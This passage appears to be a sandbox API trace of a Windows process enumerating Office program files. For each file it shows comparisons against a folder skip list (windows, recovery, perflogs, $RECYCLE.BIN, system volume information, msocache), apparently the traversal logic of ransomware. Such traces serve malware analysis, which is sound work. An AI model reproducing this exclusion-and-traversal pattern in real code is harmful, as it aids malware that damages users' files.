lpWideCharStr="ocppvwintl.dll", cchWideChar=14, lpMultiByteStr=0x345ef40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ocppvwintl.dll", lpUsedDefaultChar=0x0) returned 14 [0137.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0137.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0137.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ocppvwintl.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0137.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ocppvwintl.dll", cchWideChar=14, lpMultiByteStr=0x345ef10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ocppvwintl.dll", lpUsedDefaultChar=0x0) returned 14 [0137.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0137.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0137.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0137.581] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xed3aee76, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed3aee76, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeda6387a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1e06d8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OcPubMgr.exe", cAlternateFileName="")) returned 1 [0137.581] lstrcmpiW (lpString1="OcPubMgr.exe", lpString2=".") returned 1 [0137.581] lstrcmpiW (lpString1="OcPubMgr.exe", lpString2="..") returned 1 [0137.581] lstrcmpiW (lpString1="OcPubMgr.exe", lpString2="...") returned 1 [0137.581] lstrcmpiW (lpString1="OcPubMgr.exe", lpString2="windows") returned -1 [0137.581] lstrcmpiW (lpString1="OcPubMgr.exe", lpString2="recovery") returned -1 [0137.581] lstrcmpiW (lpString1="OcPubMgr.exe", lpString2="perflogs") returned -1 [0137.581] lstrcmpiW (lpString1="OcPubMgr.exe", lpString2="documents and settings") returned 1 [0137.581] lstrcmpiW (lpString1="OcPubMgr.exe", lpString2="$RECYCLE.BIN") returned 1 [0137.581] lstrcmpiW (lpString1="OcPubMgr.exe", lpString2="system volume information") returned -1 [0137.581] lstrcmpiW (lpString1="OcPubMgr.exe", lpString2="msocache") returned 1 [0137.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0137.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OcPubMgr.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OcPubMgr.exe", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OcPubMgr.exe", lpUsedDefaultChar=0x0) returned 12 [0137.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0137.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0137.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OcPubMgr.exe", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OcPubMgr.exe", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OcPubMgr.exe", lpUsedDefaultChar=0x0) returned 12 [0137.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0137.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0137.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0137.581] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd41f54a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcd41f54a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdecb6a42, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xdaaa8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ocrec.dll", cAlternateFileName="")) returned 1 [0137.581] lstrcmpiW (lpString1="ocrec.dll", lpString2=".") returned 1 [0137.581] lstrcmpiW (lpString1="ocrec.dll", lpString2="..") returned 1 [0137.581] lstrcmpiW (lpString1="ocrec.dll", lpString2="...") returned 1 [0137.582] lstrcmpiW (lpString1="ocrec.dll", lpString2="windows") returned -1 [0137.582] lstrcmpiW (lpString1="ocrec.dll", lpString2="recovery") returned -1 [0137.582] lstrcmpiW (lpString1="ocrec.dll", lpString2="perflogs") returned -1 [0137.582] lstrcmpiW (lpString1="ocrec.dll", lpString2="documents and settings") returned 1 [0137.582] lstrcmpiW (lpString1="ocrec.dll", lpString2="$RECYCLE.BIN") returned 1 [0137.582] lstrcmpiW (lpString1="ocrec.dll", lpString2="system volume information") returned -1 [0137.582] lstrcmpiW (lpString1="ocrec.dll", lpString2="msocache") returned 1 [0137.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0137.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ocrec.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0137.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ocrec.dll", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ocrec.dll", lpUsedDefaultChar=0x0) returned 9 [0137.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0137.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0137.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ocrec.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0137.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ocrec.dll", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ocrec.dll", lpUsedDefaultChar=0x0) returned 9 [0137.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0137.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0137.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0137.582] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c838905, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4a6b0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OCSAEXT.dll", cAlternateFileName="")) returned 1 [0137.582] lstrcmpiW (lpString1="OCSAEXT.dll", lpString2=".") returned 1 [0137.582] lstrcmpiW (lpString1="OCSAEXT.dll", lpString2="..") returned 1 [0137.582] lstrcmpiW (lpString1="OCSAEXT.dll", lpString2="...") returned 1 [0137.582] lstrcmpiW (lpString1="OCSAEXT.dll", lpString2="windows") returned -1 [0137.582] lstrcmpiW (lpString1="OCSAEXT.dll", lpString2="recovery") returned -1 [0137.582] lstrcmpiW (lpString1="OCSAEXT.dll", lpString2="perflogs") returned -1 [0137.582] lstrcmpiW (lpString1="OCSAEXT.dll", lpString2="documents and settings") returned 1 [0137.582] lstrcmpiW (lpString1="OCSAEXT.dll", lpString2="$RECYCLE.BIN") returned 1 [0137.582] lstrcmpiW (lpString1="OCSAEXT.dll", lpString2="system volume information") returned -1 [0137.582] lstrcmpiW (lpString1="OCSAEXT.dll", lpString2="msocache") returned 1 [0137.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0137.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OCSAEXT.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OCSAEXT.dll", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OCSAEXT.dll", lpUsedDefaultChar=0x0) returned 11 [0137.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0137.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0137.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OCSAEXT.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OCSAEXT.dll", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OCSAEXT.dll", lpUsedDefaultChar=0x0) returned 11 [0137.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0137.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0137.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0137.583] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb9038f2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13ac0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OFFRHD.DLL", cAlternateFileName="")) returned 1 [0137.583] lstrcmpiW (lpString1="OFFRHD.DLL", lpString2=".") returned 1 [0137.583] lstrcmpiW (lpString1="OFFRHD.DLL", lpString2="..") returned 1 [0137.583] lstrcmpiW (lpString1="OFFRHD.DLL", lpString2="...") returned 1 [0137.583] lstrcmpiW (lpString1="OFFRHD.DLL", lpString2="windows") returned -1 [0137.583] lstrcmpiW (lpString1="OFFRHD.DLL", lpString2="recovery") returned -1 [0137.583] lstrcmpiW (lpString1="OFFRHD.DLL", lpString2="perflogs") returned -1 [0137.583] lstrcmpiW (lpString1="OFFRHD.DLL", lpString2="documents and settings") returned 1 [0137.583] lstrcmpiW (lpString1="OFFRHD.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.583] lstrcmpiW (lpString1="OFFRHD.DLL", lpString2="system volume information") returned -1 [0137.583] lstrcmpiW (lpString1="OFFRHD.DLL", lpString2="msocache") returned 1 [0137.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0137.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OFFRHD.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0137.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OFFRHD.DLL", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OFFRHD.DLL", lpUsedDefaultChar=0x0) returned 10 [0137.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0137.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0137.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OFFRHD.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0137.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OFFRHD.DLL", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OFFRHD.DLL", lpUsedDefaultChar=0x0) returned 10 [0137.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0137.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0137.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0137.583] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c884dc0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x607cb8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OIMG.DLL", cAlternateFileName="")) returned 1 [0137.583] lstrcmpiW (lpString1="OIMG.DLL", lpString2=".") returned 1 [0137.583] lstrcmpiW (lpString1="OIMG.DLL", lpString2="..") returned 1 [0137.583] lstrcmpiW (lpString1="OIMG.DLL", lpString2="...") returned 1 [0137.583] lstrcmpiW (lpString1="OIMG.DLL", lpString2="windows") returned -1 [0137.583] lstrcmpiW (lpString1="OIMG.DLL", lpString2="recovery") returned -1 [0137.583] lstrcmpiW (lpString1="OIMG.DLL", lpString2="perflogs") returned -1 [0137.583] lstrcmpiW (lpString1="OIMG.DLL", lpString2="documents and settings") returned 1 [0137.583] lstrcmpiW (lpString1="OIMG.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.584] lstrcmpiW (lpString1="OIMG.DLL", lpString2="system volume information") returned -1 [0137.584] lstrcmpiW (lpString1="OIMG.DLL", lpString2="msocache") returned 1 [0137.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0137.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OIMG.DLL", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0137.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OIMG.DLL", cchWideChar=8, lpMultiByteStr=0x345ef40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OIMG.DLL", lpUsedDefaultChar=0x0) returned 8 [0137.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0137.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0137.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OIMG.DLL", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0137.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OIMG.DLL", cchWideChar=8, lpMultiByteStr=0x345ef10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OIMG.DLL", lpUsedDefaultChar=0x0) returned 8 [0137.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0137.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0137.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0137.584] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c884dc0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x40c60, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OLKFSTUB.DLL", cAlternateFileName="")) returned 1 [0137.584] lstrcmpiW (lpString1="OLKFSTUB.DLL", lpString2=".") returned 1 [0137.584] lstrcmpiW (lpString1="OLKFSTUB.DLL", lpString2="..") returned 1 [0137.584] lstrcmpiW (lpString1="OLKFSTUB.DLL", lpString2="...") returned 1 [0137.584] lstrcmpiW (lpString1="OLKFSTUB.DLL", lpString2="windows") returned -1 [0137.584] lstrcmpiW (lpString1="OLKFSTUB.DLL", lpString2="recovery") returned -1 [0137.584] lstrcmpiW (lpString1="OLKFSTUB.DLL", lpString2="perflogs") returned -1 [0137.584] lstrcmpiW (lpString1="OLKFSTUB.DLL", lpString2="documents and settings") returned 1 [0137.584] lstrcmpiW (lpString1="OLKFSTUB.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.584] lstrcmpiW (lpString1="OLKFSTUB.DLL", lpString2="system volume information") returned -1 [0137.584] lstrcmpiW (lpString1="OLKFSTUB.DLL", lpString2="msocache") returned 1 [0137.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0137.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLKFSTUB.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLKFSTUB.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLKFSTUB.DLL", lpUsedDefaultChar=0x0) returned 12 [0137.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0137.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0137.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLKFSTUB.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLKFSTUB.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLKFSTUB.DLL", lpUsedDefaultChar=0x0) returned 12 [0137.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0137.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0137.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0137.584] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xca4703d4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca829e1e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdb11bbad, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x63d2c0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OLMAPI32.DLL", cAlternateFileName="")) returned 1 [0137.584] lstrcmpiW (lpString1="OLMAPI32.DLL", lpString2=".") returned 1 [0137.584] lstrcmpiW (lpString1="OLMAPI32.DLL", lpString2="..") returned 1 [0137.585] lstrcmpiW (lpString1="OLMAPI32.DLL", lpString2="...") returned 1 [0137.585] lstrcmpiW (lpString1="OLMAPI32.DLL", lpString2="windows") returned -1 [0137.585] lstrcmpiW (lpString1="OLMAPI32.DLL", lpString2="recovery") returned -1 [0137.585] lstrcmpiW (lpString1="OLMAPI32.DLL", lpString2="perflogs") returned -1 [0137.585] lstrcmpiW (lpString1="OLMAPI32.DLL", lpString2="documents and settings") returned 1 [0137.585] lstrcmpiW (lpString1="OLMAPI32.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.585] lstrcmpiW (lpString1="OLMAPI32.DLL", lpString2="system volume information") returned -1 [0137.585] lstrcmpiW (lpString1="OLMAPI32.DLL", lpString2="msocache") returned 1 [0137.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0137.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLMAPI32.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLMAPI32.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLMAPI32.DLL", lpUsedDefaultChar=0x0) returned 12 [0137.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0137.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0137.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLMAPI32.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLMAPI32.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLMAPI32.DLL", lpUsedDefaultChar=0x0) returned 12 [0137.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0137.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0137.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0137.585] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c884dc0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x172bc, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OMML2MML.XSL", cAlternateFileName="")) returned 1 [0137.586] lstrcmpiW (lpString1="OMML2MML.XSL", lpString2=".") returned 1 [0137.586] lstrcmpiW (lpString1="OMML2MML.XSL", lpString2="..") returned 1 [0137.586] lstrcmpiW (lpString1="OMML2MML.XSL", lpString2="...") returned 1 [0137.586] lstrcmpiW (lpString1="OMML2MML.XSL", lpString2="windows") returned -1 [0137.586] lstrcmpiW (lpString1="OMML2MML.XSL", lpString2="recovery") returned -1 [0137.586] lstrcmpiW (lpString1="OMML2MML.XSL", lpString2="perflogs") returned -1 [0137.586] lstrcmpiW (lpString1="OMML2MML.XSL", lpString2="documents and settings") returned 1 [0137.586] lstrcmpiW (lpString1="OMML2MML.XSL", lpString2="$RECYCLE.BIN") returned 1 [0137.586] lstrcmpiW (lpString1="OMML2MML.XSL", lpString2="system volume information") returned -1 [0137.586] lstrcmpiW (lpString1="OMML2MML.XSL", lpString2="msocache") returned 1 [0137.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0137.586] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMML2MML.XSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.586] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMML2MML.XSL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OMML2MML.XSL", lpUsedDefaultChar=0x0) returned 12 [0137.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0137.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0137.586] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMML2MML.XSL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.586] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMML2MML.XSL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OMML2MML.XSL", lpUsedDefaultChar=0x0) returned 12 [0137.586] HeapFree (in: 